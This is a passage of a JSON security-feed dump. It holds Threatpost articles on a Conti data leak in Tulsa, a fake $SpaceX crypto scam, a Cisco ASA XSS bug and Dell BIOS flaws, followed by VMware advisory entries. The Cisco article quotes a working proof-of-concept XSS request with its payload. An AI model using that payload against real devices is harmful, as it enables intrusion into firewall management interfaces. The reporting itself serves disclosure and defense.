anyone who has filed a police report, received a police citation, made a payment with the City, or interacted with the City in any way where PII was shared, whether online, in-person or on paper, prior to May 2021, is being asked to take monitoring precautions,\u201d according to the statement.\n\nSome of the ways those potentially affected by the leak can mitigate any potential fallout include monitoring financial accounts and credit reports, asking credit/debit card companies to issue a fraud alert, changing passwords to personal accounts, and adding a second level of authentication to personal accounts and apps, the City advised.\n\n## **Criminalizing the Data**\n\nIndeed, while the information leaked \u201cmay not seem immediately useful to cybercriminals,\u201d it can be used to craft attacks that leverage social engineering to lure victims, such as phishing emails or other scams, said one security expert.\n\n\u201cIn this instance, the disclosure of police records can be used to construct convincing stories to trick unsuspecting victims or their families into paying fake fees or fines by claiming to be lawyers or court representatives,\u201d Chris Clements, vice president of solutions architecture for Cerberus Sentinel, said in an email to Threatpost. \u201cEven normally scam-savvy people may be fooled if a fraudster has enough detailed information.\u201d\n\nThe leak also shows the Conti Gang once again flexing its muscles. 
\u201cOne of the most prolific ransomware gangs in operation,\u201d the group of late has been \u201cruthless in its attacks on the public sector and [healthcare networks](<https://threatpost.com/conti-ransomware-fail-costly/166263/>),\u201d even as authorities are aggressively cracking down on and in some cases shutting down other ransomware perpetrators, another security expert observed.\n\n\u201cThe Conti group is showing a blatant disregard for the authority of law enforcement as they continue their attacks on these vital services,\u201d Erich Kron, security awareness advocate for KnowBe4, said in an email to Threatpost. \u201cEven after the shutdown of the DarkSide gang, the arrests in the takedown of the Clop group, and even in light of the Ziggy ransomware gang providing all of their encryption keys for victims due to the fear of law enforcement actions, Conti continues their attacks without skipping a beat.\u201d\n\nIndeed, the DarkSide gang, infamous for the [massively disruptive attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) on the Colonial Pipeline Co, in May [suffered a loss in access](<https://threatpost.com/darksides-servers-shutdown/166187/>) to the public part of its infrastructure \u2013 including the servers for its blog, payment processing and denial-of-service (DoS) operations \u2013 due to its seizure by law enforcement.\n\nOn the heels of that cybercriminal setback, authorities in Ukraine also took down the Clop ransomware gang in a raid in Kiev that included the arrests of six people, as well as the seizure of $185,000 in cash, a Tesla, a Mercedes and their computer equipment.\n\nMeanwhile, the Conti Gang, which has been known to demand [outrageous extortion fees](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>) from its victims for releasing files from encryption, remains unscathed and operational \u2013 for now.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat 
Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. **\n", "cvss3": {}, "published": "2021-06-24T13:14:56", "type": "threatpost", "title": "Tulsa\u2019s Police-Citation Data Leaked by Conti Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T13:14:56", "id": "THREATPOST:918D372641AFC01D7D36FE88D08ACA6E", "href": "https://threatpost.com/tulsa-police-data-leaked-conti-ransomware/167220/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T16:26:42", "description": "YouTube fans have been swindled out of almost $1 million (and counting) thanks to an extremely convincing fake SpaceX crypto-coin campaign that uses a popular decentralized finance protocol called Uniswap.\n\nThe scam is rearing its Elon-Musk-themed head in ads on YouTube that show up before and after videos about cryptocurrency, according to research from Tenable. 
The scammers have earned more than $430,000 so far across two completed campaigns, with a third still running that is on pace to bring the total \u201cearnings\u201d up to $1 million, the firm said.\n\n\u201cThe reason this particular campaign stands out is that it didn\u2019t rely on promotion through Telegram channels or social media, but it rode the wave of success scammers have found through YouTube,\u201d explained Satnam Narang, researcher at Tenable, in a [blog posting](<https://www.tenable.com/blog/elon-musk-youtube-advertising-scams-fake-spacex-coin-promoted-during-cryptocurrency-videos>) on Thursday. \u201cIt did so by leveraging the existing infrastructure of YouTube Ads to identify their target demographic of cryptocurrency enthusiasts and get their ads in front of thousands of viewers. Many new cryptocurrency investors look to YouTube channels for news and guidance, so it\u2019s an ideal channel for promoting a fake coin.\u201d\n\n## **Elon Musk: To Mars and Beyond**\n\nThe ads have been running since the end of May, according to the analysis. 
Each of them is around three to five minutes long, and all follow the same format: There\u2019s a fake tweet at the top from SpaceX and Tesla founder Musk that claims he\u2019s launching his own cryptocurrency, called $SpaceX.\n\nThe ad goes on to say that \u201cElon Musk is launching his own cryptocurrency, $SpaceX,\u201d in a bid to purportedly \u201ctake everyone to Mars and make human life possible there.\u201d To sweeten the pot, the ads then note that for each transaction involving the $SpaceX coin, a donation will be made \u201ctowards space-research companies\u201d in order to \u201chelp Elon\u2019s mission.\u201d\n\nThe YouTube ad for $SpaceX cryptocurrency.\n\nMeanwhile, an embedded video plays featuring various random clips of Musk interviews, including one for the Computer History Museum and KQED\u2019s \u201cRevolutionaries\u201d from 2013.\n\nIf someone is duped into following up on the promises of the ads, the next part of the campaign begins, by asking victims to visit one of at least a dozen purpose-built $SpaceX coin sites.\n\n\u201cThe YouTube ads themselves do not contain a direct link to a website. Instead, they advertise the website in another section of the template,\u201d explained Narang.\n\nThe websites include URLs like \u201cbuyspacex.com,\u201d \u201cmissionspx.com\u201d and \u201cmuskspx.com,\u201d among many others.\n\nThe ad space was purchased legitimately from YouTube, and Tenable said that it reached out to the platform about the situation, but it hasn\u2019t yet had a response.\n\n## **MetaMask and Uniswap: DeFi Depths**\n\nTenable\u2019s research uncovered that the websites include step-by-step directions for installing the browser-based cryptocurrency wallet called MetaMask on victims\u2019 computers. 
The version of MetaMask being pushed is the legitimate application/browser extension, used by millions of coin enthusiasts, and it\u2019s unlikely to raise red flags with victims, according to the analysis.\n\nThe next step is to direct victims to use a custom Uniswap link that allows them to import a $SpaceX coin. Uniswap is a decentralized exchange (DEX) in the world of decentralized finance (DeFi) protocols, Narang explained.\n\n\u201cAs a DeFi protocol, Uniswap allows cryptocurrency holders to exchange (or swap) tokens on the platform without a centralized entity being involved, hence the decentralized nature,\u201d he said. \u201cUniswap [also] allows individuals to create their own tokens to be tradeable on the platform.\u201d He added, \u201cAt the same time, the lack of a central authority is one of the reasons why these scams are able to operate successfully.\u201d\n\nAlthough $SpaceX coins don\u2019t actually exist as real currency, Uniswap doesn\u2019t block the transaction, Tenable found. It does, however, surface a warning that the supposed $SpaceX currency \u201cdoesn\u2019t appear on the active token list(s)\u201d and tells the user to make sure that \u201cthis is the token that you want to trade.\u201d\n\nOnce imported, the user is presented with several screenshots showing how they can cash out their Ethereum tokens for more $SpaceX coins, and how they can view their stash in the MetaMask wallet.\n\n\u201c[Conventional cryptocurrency scams](<https://threatpost.com/attackers-cashing-in-on-cryptocurrency-with-increased-scams/132275/>) ask users to send cryptocurrency to a specific address in order to \u2018double\u2019 their money, which never happens,\u201d Narang explained. \u201cHowever, this scam is actually quite nefarious. 
It creates a sense of legitimacy through the use of a notable DEX platform like Uniswap, an actual token smart contract, and the visual confirmation of tokens appearing within a user\u2019s MetaMask wallet.\u201d\n\n## **Putting Fake $SpaceX Coins into Circulation**\n\nThe campaigns are proving successful because instead of out-and-out stealing any money that people pay into the scam, the crooks deliver fake coins into unwitting victims\u2019 accounts to give them a false sense of legitimacy. They\u2019ve also been adding liquidity to the mix and performing a classic scam move called a \u201crug pull,\u201d Tenable found.\n\nIt works like this: In order to list and facilitate the trading of any coin on Uniswap, there must be liquidity, or financial backing, to the exchange. As people buy into the \u201ccontract,\u201d or trading deal, more money and liquidity hits the system and it becomes self-sustaining. That is, until the scammers decide to cash out, i.e., \u201cpull the rug,\u201d taking the funding provided by the dupes with them and leaving the $SpaceX coins worthless.\n\n\u201cThe only address capable of moving funds out of the contract is the creator. 
So even if the scammers don\u2019t pull the rug right away, current $SpaceX coin holders are unable to get their funds back anyway,\u201d Narang explained.\n\nHe added, \u201cThe scammers have provided a total liquidity of 60 Ethereum coins (20 for each contract) at a combined value of $146,300.44 at the time of funding.\u201d That makes for a tidy little profit, given the volume of other \u201cinvestments\u201d made by victims.\n\nThe scammers are also artificially manipulating the price of individual $SpaceX coins by creating coins and then sending them out of circulation by storing them in wallets on popular exchanges like Vb, Binance and Huobi, Narang said.\n\n\u201cSince these fraudulent $SpaceX coins aren\u2019t listed on any of these exchanges, the coins sent to these wallets cannot be returned and are lost forever, effectively burning them from the supply,\u201d he explained. \u201cMy understanding is that through burning these coins, the scammers are reducing the supply of available coins, thus driving up the perceived price of the $SpaceX coin.\u201d\n\nIn all, Tenable found that when the fake $SpaceX contracts were created, the scammers minted 1 billion coins in each contract and added liquidity to the contract for 200 million of them. Then they \u201cburned\u201d the remaining 800 million.\n\n## **Red Flags in a Sea of Crypto-Craziness**\n\nWhile the campaign is intensely savvy in its legitimate-seeming details, there are a few tell-tale signs that all is not what it seems. For one, the original ads are hosted on compromised YouTube accounts.\n\n\u201cWhen they appear, the name of the user associated with the advertisement is visible,\u201d Narang explained. \u201cWhen browsing the user\u2019s profile\u2026many of the accounts I encountered were created between 10-12 years ago. In [one] instance, there are no other videos associated with the account, except for the one used in the scam advertisement, but that may vary. 
It is likely these are dormant YouTube accounts, which scammers were able to compromise to promote their dodgy advertisements.\u201d\n\nSecondly, it\u2019s important to heed the cautionary signs when using a DEX. Even though they operate autonomously and provide no recourse for fraudulent transactions as a centralized, traditional bank would, they do offer warnings, such as the one that Uniswap displayed about the scam token not appearing on active token lists.\n\nDEX entities also add banners when there\u2019s an unknown source for a new contract, which users should see as a red flag before importing the token contract and swapping it for their cryptocurrency.\n\n\u201cThis is one of the first times we\u2019ve seen scammers pivot away from the conventional cryptocurrency scams of promising to double cryptocurrency and offering up a fake coin through DeFi platforms,\u201d Narang wrote. \u201cDeFi scams aren\u2019t new, but seeing the adoption of them within the context of Elon-Musk-related cryptocurrency fraud is new and unique.\u201d\n\nAnd finally, the ad template is a bit amateurish and doesn\u2019t seem like a product that would be put out by Musk & Co. Also, the use of the Tesla logo is entirely out of place, Narang pointed out.\n\n## **How Cryptocurrency Investors Can Protect Themselves from Fake Coins**\n\nThe main way to avoid scams like this is to research, research, research, Narang advised.\n\nLook for the aforementioned red flags, of course. 
But also, enthusiasts should be wary of fake coins for real projects: \u201cWhile there is no such thing as a $SpaceX coin\u2026there is a low barrier to entry to create a token contract on the Ethereum network using the same name as a real project.\u201d\n\nThus, it\u2019s important to look for official announcements from the creators of these projects \u2013 for instance, independently verify that Elon Musk is, in fact, launching such a coin, by looking for official press releases and news coverage.\n\n\u201cThey will typically share details about the release of a token contract as well as what the verified contract address is prior to deployment,\u201d Narang said.\n\nAlso, it\u2019s important to keep in mind that reviews can easily be faked.\n\n\u201cEtherscan, one of the most popular blockchain explorers for the Ethereum network, is often where cryptocurrency enthusiasts go to obtain information, such as activity related to various Ethereum-based projects,\u201d Narang said. \u201cIn the case of the fraudulent $SpaceX contracts, scammers have seeded the comments section of these pages with fake social proof. The intention behind flooding these pages with fake social proof is to ensure that any comments calling out the fraudulent nature of the $SpaceX coins get lost in the noise.\u201d\n\nIn general, it\u2019s easy to get caught up in the hype of it all, Narang warned, and crooks know this \u2013 thus, cryptocurrency scams abound out there (even [Steven Seagal was suckered](<https://threatpost.com/crypto-crook-steven-segal-scam/163612/>) into participating). 
So if there\u2019s any doubt at all about the legitimacy of a coin or project, it\u2019s probably wise to just sit it out.\n", "cvss3": {}, "published": "2021-06-24T15:44:56", "type": "threatpost", "title": "Musk-Themed '$SpaceX' Cryptoscam Invades YouTube Ads", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T15:44:56", "id": "THREATPOST:CB4A70D64DFB759DFD6E7A4029D48E10", "href": "https://threatpost.com/musk-spacex-cryptoscam-youtube-advertising/167219/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T17:22:55", "description": "Researchers have dropped a proof-of-concept (PoC) exploit on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA). The move comes as reports surface of in-the-wild exploitation of the bug.\n\nResearchers at Positive Technologies published the PoC for the bug (CVE-2020-3580) on Thursday. 
One of the researchers there, Mikhail Klyuchnikov, noted that there were a heap of researchers now chasing after an exploit for the bug, which he termed \u201clow-hanging\u201d fruit.\n\n> \ud83c\udf81PoC for XSS in Cisco ASA (CVE-2020-3580)\n> \n> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 \nHost: ciscoASA.local \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 44\n> \n> SAMLResponse=\"><svg/onload=alert('PTSwarm')> [pic.twitter.com/c53MKSK9bg](<https://t.co/c53MKSK9bg>)\n> \n> \u2014 PT SWARM (@ptswarm) [June 24, 2021](<https://twitter.com/ptswarm/status/1408050644460650502?ref_src=twsrc%5Etfw>)\n\n> The hunt for low hanging CVE-2020-3580 by [@ptswarm](<https://twitter.com/ptswarm?ref_src=twsrc%5Etfw>) has begun. \nA lot of submissions/duplicates are waiting for [@Bugcrowd](<https://twitter.com/Bugcrowd?ref_src=twsrc%5Etfw>) and [@Hacker0x01](<https://twitter.com/Hacker0x01?ref_src=twsrc%5Etfw>) [#bugbounty](<https://twitter.com/hashtag/bugbounty?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 n1 (@__mn1__) [June 24, 2021](<https://twitter.com/__mn1__/status/1408064449835978760?ref_src=twsrc%5Etfw>)\n\nMeanwhile, Tenable researchers published an alert about the PoC, noting that it has started to see cyberattacks using the vulnerability on targets in the wild.\n\n\u201cTenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\u201d according to its [Thursday alert](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>). 
\u201cWith this new information, Tenable recommends that organizations prioritize patching CVE-2020-3580.\u201d\n\nAnd indeed, the PT PoC tweet was met with plenty of \u201cOoh thanks\u201d and \u201cthank you so much\u201d responses, presumably from would-be hackers.\n\n> Thanks\ud83d\ude00, do we have to be authenticated?\n> \n> \u2014 Qasim (@00x88x) [June 24, 2021](<https://twitter.com/00x88x/status/1408069865798131726?ref_src=twsrc%5Etfw>)\n\nMeanwhile, researchers at WebSec noted that the bug could be exploited for more than XSS:\n\n> You could have gotten 2 CVE numbers for this, as this is not just XSS but also CSRF.\n> \n> \u2014 WebSec (@websecnl) [June 25, 2021](<https://twitter.com/websecnl/status/1408344288900128769?ref_src=twsrc%5Etfw>)\n\n\u201cResearchers often develop PoCs before reporting a vulnerability to a developer and publishing them allows other researchers to both check their work and potentially dig further and discover other issues,\u201d Claire Tills, senior research engineer at Tenable, told Threatpost. \u201cPoCs can also be used by defenders to develop detections for vulnerabilities. Unfortunately, giving that valuable information to defenders means it can also end up in the hands of attackers.\u201d\n\nGiven that a patch has been available for this vulnerability for several months, organizations are able to protect themselves, which isn\u2019t the case with 0-day disclosures, she pointed out. \u201cHowever, unpatched vulnerabilities continue to haunt many organizations,\u201d Tills added. 
\u201cThe public availability of a PoC is another stark reminder that effective patching is a vital step for organizations to protect themselves.\u201d\n\n## **Real-World Attacks for Cisco ASA**\n\nThe Cisco ASA is a [cybersecurity perimeter-defense appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) that combines firewall, antivirus, intrusion prevention and virtual private network (VPN) capabilities, all meant to stop threats from making it onto corporate networks. A compromise of the device is akin to unlocking the front door of the castle for storming cyberattackers.\n\nXSS attacks occur when malicious scripts are injected into otherwise benign and trusted websites; any visitors to the compromised websites are thus subject to drive-by attacks.\n\nSuccessful exploitation in this case means that unauthenticated, remote attackers could \u201cexecute arbitrary code within the [ASA] interface and access sensitive, browser-based information,\u201d Tenable added.\n\nOnce in, they could modify the device\u2019s configuration, according to Leo Pate, an application security consultant at nVisium.\n\nHowever, the target would need to be logged into the ASA for the attackers to see any joy. 
\u201cWhile this sounds dangerous, exploiting this vulnerability requires an administrative user to log in and navigate to the webpage where the attacker uploaded the malicious code,\u201d he added.\n\nAs Tenable researchers said: \u201cAn attacker would need to convince \u2018a user of the interface\u2019 to click on a specially crafted link.\u201d This can be accomplished via a spear-phishing email campaign targeting probable ASA users using malicious links, or via watering-hole attacks.\n\n\u201cThe attack vector to get this in the hands of the right people is complex, requiring a firewall administrator to be duped into clicking a cleverly crafted link,\u201d Andrew Barratt, managing principal for solutions and investigations at Coalfire, told Threatpost. \u201cFirewall administrators will need to ensure they\u2019re not accessing links to the ASA interface that appear to originate from outside.\u201d\n\nTenable declined to provide more information on the real-world attacks when asked by Threatpost.\n\nThanks to the sheer size of its footprint (including inside Fortune 500 companies), the Cisco ASA is no stranger to attention from cyberattackers. 
Last year, for example, a public PoC for another bug in the device ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) started making the rounds, leading to a [spate of exploitation efforts](<https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/>).\n\n## **Patch Now: Cisco ASA XSS Security Hole**\n\nThe flaw tracked as CVE-2020-3580 [was patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe>) on October 21 as part of a group of XSS issues in Cisco\u2019s ASA as well as the Firepower Threat Defense (FTD) software, which is a unified firewall image that includes ASA management.\n\n\u201cAll four vulnerabilities exist because Cisco ASA and FTD software web services do not sufficiently validate user-supplied inputs,\u201d according to the advisory, which noted that the bug in question rates 6.1 out of 10 on the CVSSv3 vulnerability-severity scale.\n\nThe number of vulnerable devices could be significant: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) last year found there to be 85,000 internet-accessible ASA devices. Of course, a good percentage of those could be patched against this particular vulnerability.\n\n\u201cExploits for appliances that may sit on the vanishing perimeter generally garner interest [from hackers], but fortunately in this case there are at least two things working against rampant exploitation,\u201d Tim Wade, technical director for the CTO team at Vectra, told Threatpost. \u201cFirst, a patch has been available since October. Second, an element of social engineering is required. 
This should provide some level of confidence for organizations with reasonable patch cycles and a security awareness program.\u201d\n\nUpdating to the latest versions of the affected devices\u2019 software is of course recommended; however, there\u2019s more that can be done to mitigate the vulnerability, nVisium\u2019s Pate noted.\n\n\u201cOrganizations can ask their internal teams if they need to use the web management interface, and if so, is it available to everyone on the internet or just internally to our organization? If the web management interface isn\u2019t needed, then it should be disabled,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2021-06-25T16:08:38", "type": "threatpost", "title": "Cisco ASA Bug Now Actively Exploited as PoC Drops", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-25T16:08:38", "id": "THREATPOST:0499757784EF5DB6F115661A76B7C352", "href": "https://threatpost.com/cisco-asa-bug-exploited-poc/167274/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-25T16:24:51", "description": "UPDATE\n\nA high-severity series of four vulnerabilities can allow remote adversaries to gain arbitrary code execution in the pre-boot environment on Dell devices, researchers said. They affect an estimated 30 million individual Dell endpoints worldwide.\n\nAccording to an analysis from Eclypsium, the bugs affect 129 models of laptops, tablets and desktops, including enterprise and consumer devices, that are protected by Secure Boot. Secure Boot is a security standard aimed at making sure that a device boots using only software that is trusted by the device original equipment manufacturer (OEM), to prevent rogue takeovers.\n\nThe bugs allow privileged network adversaries to circumvent Secure Boot protections, control the device\u2019s boot process, and subvert the operating system and higher-layer security controls, researchers at Eclypsium said on Thursday. They carry a cumulative CVSS score of 8.3 out of 10.\n\nSpecifically, the issues affect the BIOSConnect feature within Dell SupportAssist (a technical support solution that comes preinstalled on most Windows-based Dell machines). 
BIOSConnect is used to perform remote OS recoveries or to update the firmware on the device.\n\n\u201cTechnology vendors of all types are increasingly implementing over-the-air update processes to make it as easy as possible for their customers to keep their firmware up to date and recover from system failures,\u201d researchers noted [in an analysis](<https://www.eclypsium.com/2021/06/24/biosdisconnect/>). \u201cAnd while this is a valuable option, any vulnerabilities in these processes, such as those we\u2019ve seen here in Dell\u2019s BIOSConnect, can have serious consequences.\u201d\n\nThe report noted that the specific vulnerabilities allow an attacker to remotely exploit the UEFI firmware of a host and gain control over the most privileged code on the device.\n\n\u201cThis combination of remote exploitability and high privileges will likely make remote update functionality an alluring target for attackers in the future,\u201d the report concluded.\n\n## **Insecure TLS Connection: Impersonating Dell**\n\nThe first vulnerability (CVE-2021-21571) is the beginning of a chain that can lead to remote code execution (RCE).\n\nWhen BIOSConnect attempts to connect to the backend Dell HTTP server to perform a remote update or recovery, it enables the system\u2019s BIOS (the firmware used to perform hardware initialization during the booting process) to reach out to Dell backend services over the internet. Then, it coordinates an update or recovery process.\n\nThe issue is that the TLS connection used to connect BIOS to the backend servers will accept any valid wildcard certificate, Eclypsium researchers said. 
So, an attacker with a privileged network position can intercept that connection, impersonate Dell and deliver attacker-controlled content back to the victim device.\n\n\u201cThe process of verifying the certificate for dell.com is done by first retrieving the DNS record from the hard-coded server 8.8.8.8, then establishing a connection to [Dell\u2019s download site],\u201d according to the analysis. \u201cHowever, any valid wildcard certificate issued by any of the built-in Certificate Authorities contained within the BIOSConnect feature in BIOS will satisfy the secure connection condition, and BIOSConnect will proceed to retrieve the relevant files. The bundle of CA root certificates in the BIOS image was sourced from Mozilla\u2019s root certificate file (certdata.txt).\u201d\n\n## **Overflow Vulnerabilities Enabling Arbitrary Code Execution**\n\nOnce this first \u201cgatekeeper\u201d bug is exploited to deliver malicious content back to the victim machine, attackers then have a choice of three distinct and independent overflow vulnerabilities (CVE-2021-21572, CVE-2021-21573, CVE-2021-21574), any of which can be used to gain pre-boot RCE on the target device, researchers said.\n\nTwo of the vulnerabilities affect the OS recovery process, while the third affects the firmware update process, according to Eclypsium, which isn\u2019t releasing further technical details yet.\n\nThe attack scenario. Source: Eclypsium\n\nAny attack scenario would require an attacker to be able to redirect the victim\u2019s traffic, such as via a machine-in-the-middle (MITM) attack \u2013 something that\u2019s not much of a barrier, researchers said.\n\n\u201cMachine-in-the-middle attacks are a relatively low bar to sophisticated attackers, with techniques such as ARP spoofing and [DNS cache poisoning](<https://threatpost.com/dnspooq-flaws-allow-dns-hijacking-of-millions-of-devices/163163/>) being well-known and easily automated,\u201d according to the report. 
\u201cAdditionally, [enterprise VPNs](<https://threatpost.com/sonicwall-botches-critical-vpn-bug/167152/>) and other network devices have become a top target of attackers, and flaws in these devices can allow attackers to redirect traffic. And finally, end-users working from home are increasingly reliant on SOHO networking gear. Vulnerabilities are quite common in these types of consumer-grade networking devices and have been exploited in widespread campaigns.\u201d\n\nThe groundwork effort to carry out an attack is likely a positive tradeoff for cybercriminals, given that a successful compromise of the BIOS of a device would allow attackers to establish ongoing persistence while controlling the highest privileges on the device. This is because they would control the process of loading the host operating system, and would be able to disable protections in order to remain undetected, the report noted.\n\n\u201cThe virtually unlimited control over a device that this attack can provide makes the fruit of the labor well worth it for the attacker,\u201d Eclypsium researchers said.\n\n## **Dell Issues Patches**\n\nDell has now pushed out patches for BIOS on all of the affected systems. For details, refer to [its advisory](<https://www.dell.com/support/kbdoc/000188682>).\n\n\u201cIt is advisable to run the BIOS update executable from the OS after manually checking the hashes against those published by Dell,\u201d Eclypsium recommended, rather than relying on BIOSConnect to apply BIOS updates.\n\n_**This article was updated at 9:30 a.m. 
on June 25, to reflect that all patches have now been issued.**_\n", "cvss3": {}, "published": "2021-06-24T10:00:42", "type": "threatpost", "title": "30M Dell Devices at Risk for Remote BIOS Attacks, RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580", "CVE-2021-21571", "CVE-2021-21572", "CVE-2021-21573", "CVE-2021-21574"], "modified": "2021-06-24T10:00:42", "id": "THREATPOST:21DEB20ED3F651F477BD38ECDF58B94B", "href": "https://threatpost.com/dell-bios-attacks-rce/167195/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "vmware": [{"lastseen": "2022-05-26T00:56:14", "description": "3\\. Advisory Details \n\nA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T00:00:00", "type": "vmware", "title": "VMware Carbon Black Cloud Workload appliance update addresses incorrect URL handling vulnerability (CVE-2021-21982)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-01T00:00:00", "id": "VMSA-2021-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0005.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-02T18:42:21", "description": "3\\. VMware Carbon Black App Control updates address authentication bypass (CVE-2021-21998) \n\nThe VMware Carbon Black App Control management server has an authentication bypass. 
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "vmware", "title": "VMware Carbon Black App Control update addresses authentication bypass (CVE-2021-21998)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998"], "modified": "2021-06-22T00:00:00", "id": "VMSA-2021-0012", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0012.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T23:53:14", "description": "3\\. VMware Tools, VMRC and VMware App Volumes update addresses a local privilege escalation vulnerability (CVE-2021-21999) \n\nVMware Tools for Windows, VMRC for Windows and VMware App Volumes contain a local privilege escalation vulnerability. 
VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "vmware", "title": "VMware Tools, VMRC and VMware App Volumes update addresses a local privilege escalation vulnerability (CVE-2021-21999)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2021-06-22T00:00:00", "id": "VMSA-2021-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0013.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-24T14:52:01", "description": "An authentication bypass 